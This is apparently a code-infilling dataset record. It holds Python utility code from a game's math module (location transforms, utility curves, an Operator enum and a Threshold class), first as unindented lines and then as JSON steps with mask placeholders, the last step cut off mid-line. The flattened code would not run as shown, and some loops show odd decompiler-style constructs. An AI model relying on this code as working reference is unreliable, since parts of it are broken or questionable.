distance_to_end = max_x - last_point[0]
total_length = distance_to_end + self.points[0][1]
distance_to_pivot_point = distance_to_end/total_length
pivot_y_value = (self.points[0][1] - last_point[1])*distance_to_pivot_point + self.points[0][1]
self.points.insert(0, (0, pivot_y_value))
self.points.insert(len(self.points), (self._max_x, pivot_y_value))
def get(self, val):
return super().get(val)
class Operator(enum.Int):
__qualname__ = 'Operator'
GREATER = 1
GREATER_OR_EQUAL = 2
EQUAL = 3
NOTEQUAL = 4
LESS_OR_EQUAL = 5
LESS = 6
@staticmethod
def from_function(fn):
if fn == operator.gt:
return Operator.GREATER
if fn == operator.ge:
return Operator.GREATER_OR_EQUAL
if fn == operator.eq:
return Operator.EQUAL
if fn == operator.ne:
return Operator.NOTEQUAL
if fn == operator.le:
return Operator.LESS_OR_EQUAL
if fn == operator.lt:
return Operator.LESS
@property
def function(self):
if self.value == Operator.GREATER:
return operator.gt
if self.value == Operator.GREATER_OR_EQUAL:
return operator.ge
if self.value == Operator.EQUAL:
return operator.eq
if self.value == Operator.NOTEQUAL:
return operator.ne
if self.value == Operator.LESS_OR_EQUAL:
return operator.le
if self.value == Operator.LESS:
return operator.lt
@property
def inverse(self):
if self == Operator.GREATER:
return Operator.LESS_OR_EQUAL
if self == Operator.GREATER_OR_EQUAL:
return Operator.LESS
if self == Operator.EQUAL:
return Operator.NOTEQUAL
if self == Operator.NOTEQUAL:
return Operator.EQUAL
if self == Operator.LESS_OR_EQUAL:
return Operator.GREATER
if self == Operator.LESS:
return Operator.GREATER_OR_EQUAL
@property
def symbol(self):
if self == Operator.GREATER:
return '>'
if self == Operator.GREATER_OR_EQUAL:
return '>='
if self == Operator.EQUAL:
return '=='
if self == Operator.NOTEQUAL:
return '!='
if self == Operator.LESS_OR_EQUAL:
return '<='
if self == Operator.LESS:
return '<'
@property
def category(self):
if self == Operator.GREATER:
return Operator.GREATER
if self == Operator.GREATER_OR_EQUAL:
return Operator.GREATER
if self == Operator.EQUAL:
return Operator.EQUAL
if self == Operator.NOTEQUAL:
return Operator.EQUAL
if self == Operator.LESS_OR_EQUAL:
return Operator.LESS
if self == Operator.LESS:
return Operator.LESS
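# Illustrative note, not in the original source: Operator round-trips with the
# stdlib operator module, e.g. Operator.from_function(operator.ge) is
# Operator.GREATER_OR_EQUAL and Operator.GREATER_OR_EQUAL.function is
# operator.ge; .inverse yields the logical negation (GREATER <-> LESS_OR_EQUAL)
# and .symbol yields the printable form ('>=').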
class InequalityOperator(enum.Int):
__qualname__ = 'InequalityOperator'
GREATER = Operator.GREATER
GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL
LESS_OR_EQUAL = Operator.LESS_OR_EQUAL
LESS = Operator.LESS
with InequalityOperator.__reload_context__(InequalityOperator, InequalityOperator):
InequalityOperator.from_function = Operator.from_function
InequalityOperator.function = Operator.function
InequalityOperator.inverse = Operator.inverse
InequalityOperator.symbol = Operator.symbol
InequalityOperator.category = Operator.category
class Threshold:
__qualname__ = 'Threshold'
__slots__ = ('value', 'comparison')
def __init__(self, value=None, comparison=None):
self.value = value
self.comparison = comparison
def compare(self, source_value):
if self.value is not None and self.comparison is not None:
return self.comparison(source_value, self.value)
return False
def compare_value(self, source_value):
if self.value is not None and self.comparison is not None:
return self.comparison(source_value.value, self.value.value)
return False
def inverse(self):
return Threshold(self.value, Operator.from_function(self.comparison).inverse.function)
def __str__(self):
if self.comparison is None:
return 'None'
return '{} {}'.format(Operator.from_function(self.comparison).symbol, self.value)
def __repr__(self):
return '<Threshold {}>'.format(str(self))
def __eq__(self, other):
if not isinstance(other, Threshold):
return False
if not self.value == other.value:
return False
if not self.comparison == other.comparison:
return False
return True
def __hash__(self):
return hash((self.value, self.comparison))
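# Illustrative usage sketch, not part of the original module: Threshold pairs a
# boundary value with a comparison function from the operator module.
#   t = Threshold(50, operator.ge)
#   t.compare(75)           -> True
#   t.compare(25)           -> False
#   str(t)                  -> '>= 50'
#   t.inverse().compare(25) -> True  (inverse flips '>= 50' to '< 50')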
|
normal
|
{
"blob_id": "a0310b1bab339064c36ff0fe92d275db7a6c5ba9",
"index": 8734,
"step-1": "<mask token>\n\n\ndef rad_to_deg(rad):\n return rad * 180 / PI\n\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\n\n<mask token>\n\n\ndef vector_dot_2d(a, b):\n return a.x * b.x + a.z * b.z\n\n\ndef vector_cross(a, b):\n return Vector3(a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y -\n a.y * b.x)\n\n\n<mask token>\n\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\n\n<mask token>\n\n\ndef invert_quaternion(q):\n d = 1.0 / (q.x * q.x + q.y * q.y + q.z * q.z + q.w * q.w)\n return Quaternion(-d * q.x, -d * q.y, -d * q.z, d * q.w)\n\n\n<mask token>\n\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref',\n 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None,\n joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface,\n parent=self.parent, joint_name_or_hash=self.joint_name_or_hash,\n slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform\n )\n joint_transform = native.animation.get_joint_transform_from_rig(self\n .parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform,\n parent_transform)\n local_transform = sims4.math.Transform.concatenate(transform,\n joint_transform)\n return sims4.math.Transform.concatenate(local_transform,\n 
parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent,\n self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=\n DEFAULT, routing_surface=DEFAULT, parent=DEFAULT,\n joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent,\n joint_name_or_hash, slot_hash)\n\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = 'points',\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0]) / (p2[0] - p1[0])\n return (p2[1] - p1[1]) * percent + p1[1]\n\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1] / max_y * weight) for\n point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end / total_length\n pivot_y_value = (self.points[0][1] - last_point[1]\n ) * distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def 
inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\n\n<mask token>\n\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = 'value', 'comparison'\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison\n ).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).\n symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n",
"step-2": "<mask token>\n\n\ndef rad_to_deg(rad):\n return rad * 180 / PI\n\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\n\n<mask token>\n\n\ndef vector_dot_2d(a, b):\n return a.x * b.x + a.z * b.z\n\n\ndef vector_cross(a, b):\n return Vector3(a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y -\n a.y * b.x)\n\n\n<mask token>\n\n\ndef transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=\n QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon\n ) and quaternion_almost_equal(t1.orientation, t2.orientation,\n epsilon=epsilon_orientation)\n\n\n<mask token>\n\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\n\n<mask token>\n\n\ndef invert_quaternion(q):\n d = 1.0 / (q.x * q.x + q.y * q.y + q.z * q.z + q.w * q.w)\n return Quaternion(-d * q.x, -d * q.y, -d * q.z, d * q.w)\n\n\n<mask token>\n\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref',\n 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None,\n joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface,\n parent=self.parent, joint_name_or_hash=self.joint_name_or_hash,\n slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform\n )\n 
joint_transform = native.animation.get_joint_transform_from_rig(self\n .parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform,\n parent_transform)\n local_transform = sims4.math.Transform.concatenate(transform,\n joint_transform)\n return sims4.math.Transform.concatenate(local_transform,\n parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent,\n self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=\n DEFAULT, routing_surface=DEFAULT, parent=DEFAULT,\n joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent,\n joint_name_or_hash, slot_hash)\n\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = 'points',\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0]) / (p2[0] - p1[0])\n return (p2[1] - p1[1]) * percent + p1[1]\n\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1] / max_y * weight) for\n point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end / total_length\n pivot_y_value = (self.points[0][1] - last_point[1]\n ) * distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == 
Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\n\n<mask token>\n\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = 'value', 'comparison'\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison\n ).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).\n symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n",
"step-3": "<mask token>\n\n\ndef linear_seq_gen(start, stop, step, max_count=None):\n delta = stop - start\n num = floor(abs(delta / step))\n if max_count is not None:\n num = min(num, max_count - 1)\n if num > 0:\n for i in range(0, num + 1):\n yield start + i * delta / num\n else:\n yield start\n if stop != start:\n yield stop\n\n\n<mask token>\n\n\ndef rad_to_deg(rad):\n return rad * 180 / PI\n\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\n\n<mask token>\n\n\ndef vector_dot_2d(a, b):\n return a.x * b.x + a.z * b.z\n\n\ndef vector_cross(a, b):\n return Vector3(a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y -\n a.y * b.x)\n\n\n<mask token>\n\n\ndef almost_equal(a, b, epsilon=EPSILON):\n return abs(a - b) < epsilon\n\n\n<mask token>\n\n\ndef transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=\n QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon\n ) and quaternion_almost_equal(t1.orientation, t2.orientation,\n epsilon=epsilon_orientation)\n\n\n<mask token>\n\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\n\n<mask token>\n\n\ndef invert_quaternion(q):\n d = 1.0 / (q.x * q.x + q.y * q.y + q.z * q.z + q.w * q.w)\n return Quaternion(-d * q.x, -d * q.y, -d * q.z, d * q.w)\n\n\n<mask token>\n\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref',\n 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None,\n joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface,\n parent=self.parent, joint_name_or_hash=self.joint_name_or_hash,\n slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def 
world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform\n )\n joint_transform = native.animation.get_joint_transform_from_rig(self\n .parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform,\n parent_transform)\n local_transform = sims4.math.Transform.concatenate(transform,\n joint_transform)\n return sims4.math.Transform.concatenate(local_transform,\n parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent,\n self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=\n DEFAULT, routing_surface=DEFAULT, parent=DEFAULT,\n joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent,\n joint_name_or_hash, slot_hash)\n\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = 'points',\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0]) / (p2[0] - p1[0])\n return (p2[1] - p1[1]) * percent + p1[1]\n\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1] / max_y * weight) for\n point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end / total_length\n pivot_y_value = (self.points[0][1] - last_point[1]\n ) * distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n 
def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return 